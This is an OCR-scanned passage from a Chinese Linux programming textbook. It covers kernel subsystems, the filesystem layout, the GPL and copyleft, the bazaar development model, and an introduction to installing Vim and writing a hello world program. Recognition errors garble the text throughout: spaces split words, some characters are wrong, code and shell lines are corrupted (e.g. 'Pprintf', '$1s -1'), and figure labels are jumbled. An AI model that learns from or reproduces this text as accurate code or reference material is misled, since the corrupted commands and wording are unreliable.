分 代码 ， 并 且 子 系统 的 支持 更 加 细 化 ， 可 以 支持 硬件 体系 结构 的 多 样 性 ， 可 抢占 
内 核 的 调度 方式 支持 实时 系统 ， 可 定制 内 核 。 
口 支持 目前 最 新 的 CU， 例如 Intel 的 超 线程 、 可 扩展 的 地 址 空间 访问 。 
口 驱动 程序 框架 变更 ,例如 用 .ko 替代 了 原来 的 .o 方式 ， 消 除 内 核 竞争 ， 更 加 透明 的 
子 模块 方式 。 
口 增加 了 更 多 的 内 核 级 的 硬件 支持 。 
本 书 中 的 环境 对 Linux 的 内 核 没有 特殊 要 求 ， 因 此 读者 在 选择 内 核 版 本 的 时 候 不 需要 
重新 编译 内 核 ， 使 用 操作 系统 自 带 的 内 核 就 可 以 满足 需要 。 本 书 作 者 的 操作 系统 内 核 为 
Linux-3.2.0-44。 


1.5 Linux 的 系统 架构 


Linux 系统 从 应 用 角度 来 看 ， 分 为 内 核 空间 和 用 户 空间 两 个 部 分 。 内 核 空间 是 Linux 
操作 系统 的 主要 部 分 ， 但 是 仅 有 内 核 的 操作 系统 是 不 能 完成 用 户 任务 的 。 丰 富 并 且 功 能 强 
大 的 应 用 程序 包 是 一 个 操作 系统 成 功 的 必要 条 件 。 


1.5.1 Linux 内 核 的 主要 模块 


Linux 的 内 核 主要 由 5 个 子 系统 组 成 : 进程 调度 、 内 存 管 理 、 虚 拟 文件 系统 、 网 络 接 
口 、 进 程 间 通 信 。 下 面 将 依次 讲解 这 5 个 子 系统 。 


1. 进程 调度 SCHED 


进程 调度 指 的 是 系统 对 进程 的 多 种 状态 之 间 转 换 的 策略 。Linux 下 的 进程 调度 有 3 种 
策略 : SCHED_ OTHER、SCHED FIFO 和 SCHED RR。 
口 SCHED_ OTHER 是 用 于 针对 普通 进程 的 时 间 片 轮转 调度 策略 。 这 种 策略 中 ， 系 统 
给 所 有 的 运行 状态 的 进程 分 配 时 间 片 。 在 当前 进程 的 时 间 片 用 完 之 后 ， 系 统 从 进 
程 中 优先 级 最 高 的 进程 中 选择 进程 运行 。 
口 SCHED_ FIFO 是 针对 运行 的 实时 性 要 求 比较 高 、 运 行 时 间 短 的 进程 调度 策略 。 这 
种 策略 中 ， 系 统 按照 进入 队列 的 先后 进行 进程 的 调度 ， 在 没有 更 高 优先 级 进程 到 
来 或 者 当前 进程 没有 因为 等 待 资源 而 阻塞 的 情况 下 ， 会 一 直 运 行 。 
口 SCHED _RR 是 针对 实时 性 要 求 比较 高 、 运 行 时 间 比 较 长 的 进程 调度 策略 。 这 种 策 
略 与 SCHED_ OTHER 的 策略 类 似 ， 只 不 过 SCHED RR 进程 的 优先 级 要 高 得 多 。 
系统 分 配给 SCHED_RR 进程 时 间 片 ， 然 后 轮 循 运行 这 些 进 程 ， 将 时 间 片 用 完 的 进 
程 放 入 队列 的 末尾 。 
由 于 存在 多 种 调度 方式 ，Linux 进程 调度 采用 的 是 “有 条 件 可 剥夺 ”的 调度 方式 。 普 
通 进程 中 采用 的 是 SCHED OTHER 的 时 间 片 轮 循 方式 ， 实 时 进程 可 以 剥夺 普通 进程 。 如 
果 普 通 进程 在 用 户 空 间 运行 ， 则 普通 进程 立即 停止 运行 ， 将 资源 让 给 实时 进程 ， 如 果 普 通 
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进程 运行 在 内 核 空 间 ， 需 要 等 系统 调用 返回 用 户 空 间 后 方 可 剥夺 资源 。 
2. 内 存 管理 MMU 


内 存 管理 是 多 个 进程 间 的 内 存 共享 策略 。 在 Linux 系统 中 ， 内 存 管理 的 主要 概念 是 虚 
拟 内 存 。 

虚拟 内 存 可 以 让 进程 拥有 比 实际 物理 内 存 更 大 的 内 存 ， 可 以 是 实际 内 存 的 很 多 倍 。 每 
个 进程 的 虚拟 内 存 有 不 同 的 地 址 空间 ， 多 个 进程 的 虚拟 内 存 不 会 冲突 。 

虚拟 内 存 的 分 配 策略 是 每 个 进程 都 可 以 公平 地 使 用 虚拟 内 存 。 虚 拟 内 存 的 大 小 通常 设 
置 为 物理 内 存 的 两 倍 。 


3. 虚拟 文件 系统 VFS 


在 Linux 下 支持 多 种 文件 系统 ， 如 ext、 ext2、minix、umsdos、msdos、vfat、 ntfs、proc、 
smb、ncp、iso9660、sysv、hpfs、affs 等 。 目 前 Linux 下 最 常用 的 文件 格式 是 ext2 和 ext3。 
ext2 文件 系统 用 于 固定 文件 系统 和 可 活动 文件 系统 ， 是 ext 文件 系统 的 扩展 。ext3 文件 系 
统 是 在 ext2 上 增加 日 志 功 能 后 的 扩展 , 它 兼 容 ext2。 两 种 文件 系统 之 间 可 以 互相 转换 , ext2 
不 用 格式 化 就 可 以 转换 为 ext3 文件 系统 ， 而 ext3 文件 系统 转换 为 ext2 文件 系统 也 不 会 丢 
失 数 据 。 

4. 网 络 接口 


Linux 是 在 Internet 飞速 发 展 的 时 期 成 长 起 来 的 ,所 以 Linux 支持 多 种 网 络 接口 和 协议 。 
网 络 接口 分 为 网 络 协议 和 驱动 程序 ， 网 络 协议 是 一 种 网 络 传输 的 通信 标准 ， 而 网 络 驱动 则 
是 对 硬件 设备 的 驱动 程序 。Linux 支持 的 网 络 设备 多 种 多 样 ， 儿 乎 目前 所 有 网 络 设备 都 有 
驱动 程序 。 

5. 进程 间 通 信 

Linux 操作 系统 支持 多 进程 ， 进 程 之 间 需 要 进行 数据 的 交流 才能 完成 控制 、 协 同 工 作 


等 功能 ，Linux 的 进程 间 道 信和 是 从 UNIX 系统 继承 过 来 的 。Linux 下 的 进程 间 的 通信 方式 主 
要 有 管道 方式 、 信 号 方式 、 消 息 队列 方式 、 共 享 内 存 和 套 接 字 等 方法 。 


1.5.2 ”Linux 的 文件 结构 


与 Windows 下 的 文件 组 织 结构 不 同 ，Linux 不 使 用 磁盘 分 区 符号 来 访问 文件 系统 ， 而 
是 将 整个 文件 系统 表示 成 树 状 的 结构 ，Linux 系统 每 增加 一 个 文件 系统 都 会 将 其 加 入 到 这 
个 树 中 。 

操作 系统 文件 结构 的 开始 ， 只 有 一 个 单独 的 顶级 目录 结构 ， 叫 做 根 目 录 。 所 有 一 切 都 
从 “ 根 ” 开 始 ， 用 “/” 代 表 ， 并 且 延 伸 到 子 目 录 。DOS/Windows 下 文件 系统 按照 磁盘 分 
区 的 概念 分 类 , 目录 都 存 于 分 区 上 。 Linux 则 通过 “ 挂 接 ” 的 方式 把 所 有 分 区 都 放置 在 “ 根 ” 
下 各 个 目录 里 。 一 个 Linux 系统 的 文件 结构 如 图 1.1 所 示 。 

不 同 的 Linux 发 行 版 本 的 目录 结构 和 具体 的 实现 功能 存在 一 些 细微 的 差别 。 但 是 主要 
的 功能 都 是 一 致 的 。 一 些 常用 目录 的 作用 如 下 所 述 。 
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口 /etc: 包括 绝 大 多 数 Linux 系统 引导 所 需要 的 配置 文件 , 系统 引导 时 读 取 配 置 文件 ， 
按照 配置 文件 的 选项 进行 不 同情 况 的 启动 , 例如 
fstab、host.conf 等 ; 

口 /lib: 包含 C 编译 程序 需要 的 函数 库 ， 是 一 组 二 
进 制 文件 ， 例 如 glibc 等 ; 

口 /usr: 包括 所 有 其 他 内 容 ， 如 src、local。Linux 
的 内 核 就 在 /usr/src 中 。 其 下 有 子 目 录 /bin， 存 放 
所 有 安装 语言 的 命令 ， 如 gcc、perl 等 ; 

口 /var: 包含 系统 定义 表 ， 以 便 在 系统 运行 改变 时 

可 以 只 备份 该 目录 ， 如 cache; 

/tmp: 用 于 临时 性 的 存储 ; 

/bin: 大 多 数 命 令 存 放 在 这 里 ; 

/home: 主要 存放 用 户 账号 ， 并 且 可 以 支持 ftp 

的 用 户 管理 。 系 统管 理 员 增加 用 户 时 ， 系 统 在 

home 目录 下 创建 与 用 户 同 名 的 目录 ， 此 目录 下 

一 般 默 认 有 Desktop 目录 ; 

口 /dev: 这 个 目录 下 存放 一 种 设备 文件 的 特殊 文 
件 ， 如 fa0、had 等 ; 

口 /mnt: 在 Linux 系统 中 ， 它 是 专门 给 外 挂 的 文件 
系统 使 用 的 ， 里 面 有 两 个 文件 cdrom、floopy， 
登录 光驱 、 软 驱 时 要 用 到 。 

刚 开 始 使 用 Linux 的 人 比较 容易 混淆 的 是 Linux 下 
使 用 斜 杠 “/”, 而 在 DOS/Windows 下 使 用 的 是 反 斜 杠 \”。 图 11 Linux 文件 系统 结构 示意 图 
例如 在 Linux 中 ， 由 于 从 UNIX 集成 的 关系 ， 路 径 用 
“usrsrc/Linux ”表示 ， 而 在 Windows 下 则 用 “\usrsrc\Linux ”表示 。 在 Linux 下 更 加 普遍 
的 问题 是 字母 大 小 写 敏感 ， 例 如 文件 Hello.c 和 文件 hello.c 在 Linux 下 不 是 一 个 文件 ， 而 
在 Windows 下 则 表示 同一 个 文件 。 


口 口 口 


1.6 ”GNU 通用 公共 许可 证 


GNU 通用 公共 许可 证 (简称 为 GPL) 是 由 自由 软件 基金 会 发 行 的 用 于 计算 机 软件 的 
一 种 许可 证 制度 。GPL 最 初 是 由 Richard Stallman 为 GNU 计划 而 撰写 。 目 前 ，GNTU 通行 
证 被 绝 大 多 数 的 GNU 程序 和 超过 半数 的 自由 软件 采用 。 此 许可 证 最 新 版 本 为 “版 本 3”， 
于 2007 年 发 布 。GNU 宽 通用 公共 许可 证 (简称 LGPL》〉 是 由 GPL 衍生 出 的 许可 证 ， 被 用 
于 一 些 GNU 程序 库 。 


1.6.1 GPL 许可 证 的 历史 


GNU 通用 公共 许可 证 是 由 Richard Stallman 为 了 GNU 计划 而 撰写 的 ， 它 以 GNU 的 
Emacs、GDB、GCC 的 早期 许可 证 为 蓝本 。 上 述 的 这 些许 可 证 都 包含 了 一 些 GPL 中 的 版 权 
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思想 , 但 是 仅仅 针对 特定 的 某 个 程序 。Richard Stallman 的 目标 是 创造 出 一 种 通用 的 软件 许 
可 证 制度 ， 来 为 所 有 的 开源 软件 代码 计划 使 用 。 

GPL 的 “版 本 1”， 在 1989 年 1 月 诞生 。 在 1990 年 时 ， 因 为 一 些 共享 库 的 使 用 而 出 现 
了 对 GPL 许可 证 制度 更 为 宽松 的 需求 ， 在 GPL“ 版 本 2” 于 1991 年 6 月 发 布 时 ， 另 一 许 
可 证 一 一 库 通 用 许可 证 (Library General Public License， 简 称 LGPL ) 也 随 之 发 布 ， 并 记 做 
“版 本 2” 以 示 对 GPL 的 补充 。 在 LGPL 版 本 2.1 发 布 时 与 GPL 版 本 不 再 对 应 ， 而 LGPL 
也 被 重 命名 为 GNU 宽 通 用 公共 许可 证 (Lesser General Public License ) 。 

GPLv3 在 2007 年 6 月 份 开始 使 用 ， 由 于 对 专利 权 和 数字 版 权限 制 的 问题 造成 了 自由 
软件 阵营 的 一 次 很 大 的 争论 。Stallman 于 2006 年 2 月 25 日 在 自由 开源 软件 开发 者 欧洲 会 
议 上 发 表 的 演讲 中 ， 对 GPLv3 的 特点 作 了 解释 ， 相 对 于 GPLv2， 主 要 有 如 下 4 个 不 同 的 
方面 : 

口 数字 版 权 问题 。 在 GPLv3 中 禁止 使 用 GPLv3 本 身 作为 数字 版 权 的 一 部 分 , 同时 消 

费 类 电子 设备 上 使 用 GPLv3 代码 必须 开放 源 代码 ， 而 且 允 许 用 户 自己 重新 构建 。 

口 专利 扩散 许可 。 在 GPLv3 中 如 果 具 有 专利 的 代码 加 入 之 后 ， 此 专利 会 自动 向 整个 
应 用 程序 授权 此 专利 。 

口 衍生 产品 的 定义 。 在 GPLv3 中 定义 了 衍生 产品 ， 即 如 果 某 个 模块 采用 了 GPLv3 
协议 ， 某 个 产品 使 用 此 模块 动态 链接 后 ， 如 果 此 模块 可 以 被 其 他 模块 代替 ， 则 这 
个 产品 不 是 GPLv3 协议 ， 否 则 需要 采用 GPLv3 协议 。 

口 GPLv3 协议 与 其 他 协议 的 兼容 问题 。 


1.6.2 GPL 的 自由 理念 


软件 的 版 权 保护 机 制 在 保护 发 明 人 权益 的 同时 ， 对 软件 的 技术 进步 造成 了 影响 。 版 权 
所 有 软件 的 最 终 用 户 儿 乎 不 能 从 所 购买 的 软件 中 得 到 任何 软件 设计 相关 的 权利 (除了 使 用 
的 权利 )， 甚 至 可 能 限制 像 逆向 工程 等 法 律 允 许 范 围 内 的 行为 。 与 此 对 应 ，GPL 授予 程序 
的 接受 方 下 述 的 权利 ， 即 GPL 所 倡导 的 “自由 六 

口 可 以 以 任何 目的 运行 所 购买 的 程序 ; 

口 在 得 到 程序 代码 的 前 提 下 ， 可 以 以 学 习 为 目的 ， 对 源 程序 进行 修改 ; 

口 可 以 对 复制 件 进行 再 发 行 ; 

口 对 所 购买 的 程序 进行 改进 ， 并 进行 公开 发 布 。 

自由 软件 许可 证 除了 GPL 许可 证 之 外 ， 还 有 一 些 其 他 的 许可 证 ， 如 BSD、APACHE 
等 许可 证 。 一 些许 可 证 比 GPL 的 许可 证 的 限制 要 少 得 多 ， 例 如 BSD 许可 证 并 不 禁止 其 演 
绎 作品 变 成 版 权 所 有 软件 ,它们 之 间 的 最 主要 区 别 是 GPL 提供 一 种 软件 复制 和 演绎 产品 的 
许可 证 继承 保证 。Stallman 发 明了 一 种 叫做 Copyleft 的 法 律 机 制 ， 要 求 所 有 GPL 程序 的 演 
绎 作品 也 要 在 GPL 许可 证 之 下 。 
目前 ，GPL 许可 证 是 自由 软件 和 开源 软件 的 最 流行 许可 证 。 到 2004 年 4 月 为 止 , GPL 
许可 证 已 占 freshmeat (最 大 的 UNIX 平台 和 跨 平台 软件 网 络 发 布 平台 ) 上 所 列 的 自由 软件 
的 75%，SourceForge 上 所 列 软 件 的 68%。GNU 软件 中 最 著名 的 GPL 自由 软件 包括 Linux 
内 核 和 GCC 编译 器 包 。 


| 


第 1 章 Linux 操作 系统 概述 


1.6.3 ”GPL 的 基本 条 款 


GPL 许可 证 作为 Linux 平台 软件 的 主要 许可 证 ， 有 很 多 独特 的 地 方 。GPL 授权 的 软件 
不 是 说 使 用 者 在 得 到 此 软件 后 可 以 无 限制 地 使 用 ， 而 是 要 遵循 一 定 的 规则 ， 其 中 主要 的 
一 点 就 是 开放 源 代码 。 使 用 GPL 授权 发 布 的 商业 软件 ， 也 并 不 是 不 要 钱 ， 其 各 利 模式 是 采 
收取 服务 费用 的 方式 来 获取 利益 。GPL 中 的 主要 条 款 包 括 权 利 授予 、Copyleft。 


1. 授予 的 权利 


采用 GPL 条 款 的 软件 分 发 给 使 用 人 ， 不 管 是 收费 还 是 免费 ， 其 作品 符合 GPL 授权 ， 
获得 GPL 作品 的 人 成 为 许可 证 接受 人 。 许 可 证 接受 人 有 修改 、 复 制 、 再 发 行 此 作品 或 者 此 
作品 的 演绎 版 本 的 权利 ， 许 可 证 接受 人 可 以 由 上 述 的 行为 收取 费用 而 获 利 。 与 一 般 禁 止 商 
业 用 途 的 软件 不 同 ，GPL 授权 的 软件 不 禁止 商业 用 途 , 例如 Stallman 最 初 的 Emacs 就 是 收 
取 费 用 的 ， 每 份 150 美元 。 

GPL 的 授权 通常 被 人 理解 为 免费 , 其 实 这 是 两 种 完全 不 同 的 概念 : GPL 在 出 售 产品 的 
同时 需要 提供 源 代 码 ， 同 时 允许 获得 软件 的 产品 进行 再 次 发 布 。 一 般 的 GPL 分 发 软件 的 莉 
利 模式 是 采用 服务 的 方式 ， 即 如 果 想 更 好 地 使 用 此 软件 ， 需 要 向 分 发 者 提供 报酬 ， 分 发 者 
对 使 用 者 的 软件 进行 优化 或 者 进行 人 员 培 训 等 工作 。 例 如 IBM 提供 的 软件 中 就 有 GPL 协 
议 的 ， 但 是 IBM 是 典型 的 服务 获 利 的 公司 。 

GPL 授权 的 另 一 层 含义 是 要 求 分 发 者 提供 源 代 码 ， 防 止 软件 开发 商 对 软件 进行 锁定 ， 
限制 用 户 的 某 些 行 为 。 如 果 用 户 获 得 源 代码 ,在 分 析 源 代码 的 基础 上 ， 可 以 修改 某 些 设置 ， 
对 源 软 件 进行 功能 开放 。 


2. Copyleft 


GPL 许可 证 不 是 授予 许可 证 接受 人 无 限制 的 权利 ， 接 受 人 在 因为 GPL 而 获 益 的 时 候 
(获得 软件 产品 的 源 代码 〉 必 须 遵守 一 定 的 要 求 。GPL 协议 要 求 许可 证 的 接受 人 在 进行 软 
件 再 次 发 布 的 时 候 必须 要 公开 源 代码 ， 同 时 允许 对 再 发 行 软件 进行 的 复制 、 发 行 、 修 改 等 
的 权利 ， 即 再 发 行 的 软件 必须 为 GPL 许可 证 。 

上 述 的 这 种 要 求 称 为 Copyleft，GPL 由 此 而 被 称 为 “被 黑 的 版 权 法 ”。 因 为 GPL 的 法 
理 基 础 是 承认 软件 是 拥有 版 权 的 ， 即 作品 在 法 律 上 归 版 权 所 有 。 由 于 软件 的 版 权 由 发 行者 
所 有 , 所 以 发 行者 可 以 对 软件 的 发 行规 定 进 行 设置 , GPL 就 是 发 行者 对 版 权 进 行 上 述 规定 ， 
放弃 一 定 的 版 权 。 如 果 某 个 再 发 行 版 本 不 遵循 GPL 许可 证 ， 因 为 原作 者 对 作品 拥有 版 权 ， 
这 样 就 有 可 能 被 原作 者 起 诉 。 

GPL 的 copyleft 仅仅 在 程序 的 再 发 行 时 发 生 作 用 ， 如 果 受 权 人 对 软件 进行 修改 后 没有 
进行 发 行 ， 是 可 以 不 开放 源 代 码 的 。Copyleft 只 对 发 行 的 软件 本 身 起 作用 ， 对 于 软件 的 输 
出 或 者 工作 成 果 不 起 作用 。 

GPL 软件 的 发 行 方法 都 是 把 源 代 码 和 可 执行 程序 一 同 发 行 ， 一 般 提供 例如 CD 等 。 目 
前 通行 的 发 行 GPL 软件 的 方法 是 将 软件 放置 到 互联 网 上 , 由 用 户 来 下 载 , 例如 HTTP、FTP 
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1.6.4 ”关于 GPL 许可 证 的 争议 


使 用 GPL 的 许可 证 造成 了 很 多 争议 ， 主 要 是 对 软件 版 权 方面 的 界定 、GPL 的 软件 传 
染 性 、 商 业 开发 方面 的 困扰 等 。 比较 有 代表 性 的 是 对 GPL 软件 产品 的 链接 库 使 用 的 产品 版 
权 界 定 ， 即 非 GPL 软件 是 否 可 以 链接 到 GPL 的 库 程序 。 

对 于 GPL 开放 源 代码 进行 修改 的 产品 遵循 GPL 的 授权 规定 是 很 明确 的 ， 但 是 对 于 使 
GPL 链接 库 的 产品 是 否 需 要 遵循 GPL 存在 很 大 分 歧 , 但 是 其 他 专家 并 不 认同 这 种 观点 ， 
分 成 了 自由 和 开放 源 代码 社区 两 派 。 这 个 问题 其 实 不 是 技术 问题 ， 这 是 一 个 法 律 界定 的 问 
题 ， 需 要 法 律 的 案例 来 例证 。 

由 于 GPL 许可 证 需要 授权 人 对 再 发 行 产品 按照 GPL 许可 证 发 行 ， 所 以 在 使 用 许可 证 
软件 的 时 候 需 要 注意 。 有 很 多 协议 是 GPL 兼容 的 ， 即 这 种 协议 和 GPL 协议 的 软件 共同 使 
用 , 并 且 将 开发 完毕 的 软件 产品 作为 GPL 来 发 行 是 没有 问题 的 , 例如 MIT/X 许可 证 、BSD 
许可 证 、LGPL， 它 们 和 GPL 许可 证 兼容 ， 有 一 些许 可 证 是 GPL 不 兼容 的 ， 例 如 某 些 自由 
软件 的 许可 证 。 开 发 者 在 开发 的 时 候 ， 要 使 用 GPL 兼容 的 许可 证 ， 以 免 引 起 法 律 问 题 。 

GPL 再 发 行 软件 必须 采取 GPL 许可 证 的 问题 ， 被 微软 的 首席 执行 官 Steve Ballmer 称 
为 “癌症 ” 认为 GPL 是 有 “传染 性 ”的 “病毒 ” 由 于 包含 GPL 代码 或 动态 链接 到 GPL 
库 被 理解 为 “演绎 作品 ” 必须 按照 GPL 许可 证 的 强制 继承 来 使 用 GPL 分 发 。 微 软 已 经 以 
GPL 为 许可 证 发 行 了 SFU (Microsoft Windows Services for UNIX) 中 所 包含 的 部 分 组 件 ， 
例如 GCC 编译 器 。 


1.7 Linux 软件 开发 的 可 借鉴 之 处 


在 Linix 的 发 展 过 程 中 ， 形 成 了 一 种 独特 的 成 功 模式 ， 包 含 软件 的 开发 模式 。Linux 操 
作 系 统 的 成 功 从 一 个 系统 工程 的 角度 看 有 很 多 值得 项 目 管理 人 员 学 习 的 东西 ， 例 如 《大 教 
党 与 集 市 》 一 书 中 对 Linux 的 开发 模式 进行 了 比较 详细 的 分 析 , 它 主要 包含 如 下 几 个 方面 。 
口 使 用 集 市 模式 进行 软件 开发 应 该 有 一 个 基本 成 型 的 软件 原型 ， 这 样 后 来 的 参与 者 
能 够 对 此 进行 改进 ， 更 重要 的 是 能 够 看 到 成 功 的 电光、 可 以 看 到 不 远 的 将 来 能 够 
成 功 ， 获 得 参与 的 动力 。 
口 集 市 模式 的 开发 把 软件 的 使 用 者 作为 开发 的 协作 者 而 不 仅仅 是 一 个 简单 的 用 户 ， 
这 样 开发 者 和 使 用 者 能 够 共同 对 作品 进行 快速 的 代码 改进 和 高 效率 的 调试 。 
口 集 市 模式 开发 使 用 早 发 布 、 常 发 布 的 方法 ， 来 方便 听取 客户 的 建议 ， 对 软件 进行 
改进 。 项 目的 开发 者 想 出 好 主意 是 件 好事 ， 而 从 使 用 者 那里 获得 的 建议 是 比 前 者 
更 好 的 事情 。 因 为 从 使 用 者 那里 提出 的 建议 是 有 的 放 矢 ， 更 加 切合 实际 的 。 
口 集 市 的 开发 模式 验证 了 如 下 一 个 成 功 的 假设 : 如 果 参 与 软件 Beta 版 测试 的 人 员 足 
够 多 ， 几 乎 软件 中 所 有 存在 的 问题 都 能 够 被 迅速 地 找 出 并 进行 纠正 。 
口 对 于 集 市 开发 模式 的 项 目 来 说 ， 比 技能 和 设计 能 力 更 为 重要 的 是 项 目 协调 人 员 必 
须 具有 良好 的 人 际 和 交流 能 力 。 因 为 为 了 建造 一 个 成 功 的 开发 小 组 ， 需 要 项 目的 
领导 人 员 所 作 所 为 必须 让 参与 者 感 兴趣 并 能 够 有 参与 的 动力 ， 使 得 参与 者 感到 他 
们 正在 做 的 工作 十 分 有 趣 〈 这 是 因为 一 般 的 项 目 是 没有 报酬 的 ， 大 家 按照 兴趣 参 
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加 ) ， 这 不 仅仅 是 项 目的 本 身 ， 与 领导 者 的 个 人 素质 有 很 大 的 关系 。 


使 用 聪明 的 数据 结构 和 笨拙 的 代码 的 搭配 方式 要 比 相反 的 搭配 方式 更 好 ， 可 以 作为 软件 开 
发 的 一 种 基本 的 常识 。 


1.8 小 结 


本 章 对 Linux 的 形成 历史 进行 了 简单 的 介绍 ， 并 对 其 发 展 历程 中 起 重要 作用 的 5 个 要 
素 进行 了 解释 。 与 UNIX 系统 相 比 较 ，Linux 操作 系统 有 很 多 不 同 之 处 ， 特 别 是 在 版 权 
方面 。 

Linux 的 发 行 版 本 数 以 百 计 ， 其 中 的 Debian、Fedora Core、openSUSE， 以 及 Ubuntu 
是 比较 有 代表 性 的 集中 。 本 书 中 的 例子 均 以 Ubuntu 为 例 进行 介绍 。 本 章 还 介绍 了 Linux 
的 系统 架构 和 Linux 内 核 模块 之 间 的 关系 ， 对 GNU 的 通用 公共 许可 证 进行 了 介绍 ， 特 别 
是 GNU 的 Copyleft 概念 。 最 后 介绍 了 Linux 开发 模式 的 成 功 之 处 ， 对 集 市 开发 模式 进行 
了 简单 的 介绍 。 
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在 第 1 章 中 对 Linux 的 发 展 历史 和 特点 进行 了 简单 的 介绍 ， 要 在 Linux 环境 下 进行 程 
序 设计 ， 还 需要 对 Linux 的 环境 有 所 了 解 。 本 章 对 Linux 的 编程 环境 进行 介绍 ， 通 过 本 章 
的 学 习 ， 读 者 将 能 够 在 Linux 环境 下 编写 、 编 译 和 调试 程序 。 在 Linux 环境 下 进行 程序 开 
发 时 ， 除 了 需要 有 一 个 可 运行 的 Linux 环境 ， 还 需要 具有 如 下 的 基本 知识 : Linux 命令 行 
的 环境 和 登录 方式 ，Bash Shell 的 使 用 。 

在 具有 以 上 条 件 的 基础 上 ， 对 编程 基本 知识 有 了 基本 的 了 解 后 ， 就 可 以 进行 编程 工作 
了 。 本 章 对 Linux 操作 系统 下 的 编程 环境 进行 介绍 ， 主 要 包括 如 下 内 容 : 

口 了 解 如 何 使 用 Linux 下 常用 的 编辑 器 ， 主 要 对 Vim 进行 介绍 ; 

口 了 解 GCC 编译 、 链 接 ， 懂 得 如 何 进行 编译 程序 ， 并 能 根据 情况 进行 优化 和 修改 
代码 ; 
Makefile 的 编写 ; 
理解 程序 的 编译 链接 和 执行 的 过 程 ， 这 对 程序 的 编写 有 很 大 的 帮助 ; 
了 解 在 Linux 环境 下 如 何 调试 程序 ， 能 够 使 用 GDB 调试 程序 。 


口 口 口 


2.1 Linux 环境 下 的 编辑 器 


在 Linux 环境 下 有 很 多 编译 器 ,例如 基于 行 的 编辑 器 ed 和 ex, 基于 文本 的 编辑 器 Vim、 
Emacs 等 。 使 用 文本 编辑 器 可 以 帮助 用 户 翻 页 、 移 动 光 标 、 查 找 字 符 、 和 替换 字符 、 删 除 等 
操作 。 本 节 中 对 Vim 编辑 器 进行 详细 的 介绍 ， 并 简单 介绍 其 他 的 编辑 器 。 


2.1.1 Vim 使 用 简介 


Vi 是 visual editor 的 简写 ， 发 音 为 [viailj， 是 UNIX 系统 下 最 通用 的 文本 编辑 器 。Vi 
不 是 一 个 所 见 即 所 得 的 编辑 器 ,如 果 要 进行 复制 和 格式 化 文本 需要 手动 输入 命令 进行 操作 。 
安装 好 Linux 操作 系统 后 ， 一 般 已 经 默认 安装 了 Vi 编辑 器 。 为 了 使 用 方便 ， 建 议 安装 Vi 
的 扩展 版 本 Vim， 它 比 Vi 更 强大 ， 更 加 适合 初学 者 使 用 。 


1. Vim 的 安装 
在 介绍 如 何 使 用 Vim 编译 器 之 前 需要 先 安装 Vim 软件 包 ,， 如果 没 有 安装 Vim, 可 以 使 
如 下 命令 进行 安装 。 


#apt-get install vim (使 用 apt-get 命令 安装 vi) 
Reading package lists... Done (检查 软件 包 列 表 ) 
Building dependency tree... Done (建立 依赖 ) 

Suggested packages: 
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ctags vim-doc vim-scripts 


The following NEW packages will be installed: (如 下 软件 包 将 被 安装 ) 
vim (vim 软件 包 ) 
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 
(软件 包 变更 统计 ) 


Need to get 0B/745kB of archives. 
After unpacking 1438kB of additional disk space will be used. 
Selecting previously deselected package vim. 
(Reading database ... 83502 files and directories currently installed.) 
Unpacking vim (from .../vim 7.0-122+letch3 i386.deb) ... 

(解压 vim) 
Setting up vim(7.0-122+letch3) ... (设置 vim) 


在 Ubuntu 下 ，apt-get 工具 对 系统 的 软件 包 进 行 管理 。install 选项 安装 会 自动 查找 和 安 
装 指定 的 软件 包 ， 其 命令 格式 为 : 


apt-get install 软件 包 的 名 字 


2. Vim 编辑 器 的 模式 


Vim 主要 分 为 普通 模式 和 插入 模式 。 普 通 模式 是 命令 模式 ， 插 入 模式 是 编辑 模式 。 

在 插入 模式 下 可 以 进行 字符 的 输入 ， 输 入 的 键 值 显示 在 编辑 框 中 ， 这 些 文本 可 以 用 于 
编辑 。 普 通 界面 是 进行 命令 操作 的 ， 输 入 的 值 代表 一 个 命令 。 例 如 在 普通 模式 下 按 h 键 ， 
光标 会 向 左 移动 一 个 字符 的 位 置 。 

插入 模式 和 普通 模式 的 切换 分 别 为 按 i 键 和 Esc 键 。 在 普通 模式 下 按 i 键 ， 会 转 入 插 
入 模式 ， 在 插入 模式 下 按 Esc 键 进入 普通 模式 。 在 用 户 进入 Vim 还 没有 进行 其 他 操作 时 ， 
操作 模式 是 普通 模式 。 
2.1.2 使 用 Vim 建立 文件 

Vim 的 命令 行 格式 为 “vim 文件 名 ” 文件 名 是 所 要 编辑 的 文件 名 。 例 如 要 编辑 一 个 
“hello.c” 的 C 文件 ， 按 照 如 下 所 述 的 步骤 进行 操作 。 

1. 建立 文件 

使 用 Vim 建立 一 个 新 文件 的 命令 格式 为 “vim 文件 名 ”。 使 用 如 下 命令 建立 一 个 hello.c 
的 C 语 言 源 文件 ， 并 同时 将 文件 打开 。 

$vim hello.c 

2. 进入 插入 模式 


打开 文件 后 ， 默 认 情况 下 进入 普通 模式 。 按 i 键 ， 进 入 插入 模式 ，vim 会 在 窗口 的 底部 
显示 “--INSERT--”( 中 文 模式 显示 下 显示 的 是 “-- 插 入 --”)， 这 表示 当前 模式 为 插入 模式 。 

在 输入 文本 的 时 候 , 最 下 边 有 一 个 指示 框 ,告诉 用 户 正在 编辑 文件 的 一 些 信息 , 例如 : 

-- INSERT --— 全 区 下 All 

表示 当前 模式 为 插入 模式 ， 光 标 在 第 6 行 第 11 个 字符 位 置 上 。 

新 接触 Vim 的 读者 常常 会 不 知道 自己 在 什么 模式 下 , 或 者 不 小 心 输入 了 错误 的 指令 和 


。15 。 
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错误 的 操作 。 如 果 遇 到 这 种 情况 ， 无 论 在 什么 模式 下 ， 要 回 到 普通 模式 只 需 按 Esc 键 就 可 
以 了 。 有 时 会 按 两 次 Esc 键 ， 当 Vim 发 出 “ 跑 ” 的 一 声 ， 就 表示 Vim 已 经 在 普通 模式 了 。 
3. 文本 输入 
在 编辑 区 输入 如 下 文本 : 


1 #include <stdio.h> 

2 

3 int main (void) 

i 

5 Pprintf("Hello World!\n"); 
6 return 0; 


| 

输入 第 一 行 后 ， 按 Enter 键 开始 一 个 新 行 。 

4. 退出 Vim 

当 编 译 完成 后 , 按 Esc 键 退 出 插入 模式 回 到 普通 模式 , 输入 “: wq” 退 出 Vim 编辑 器 。 
运行 命令 ls: 


$1s -1 (查看 当前 目录 下 的 文件 ) 

hello.c 

会 发 现 当前 目录 下 已 经 存在 一 个 名 为 hello.c 的 文件 。 输 入 的 wq 是 “保存 后 退出 ”的 
意思 : q 表示 退出 ，w 表示 保存 。 当 不 想 保存 所 作 的 修改 时 ,输入 “:” 键 后 ,再 输入 “q!”， 
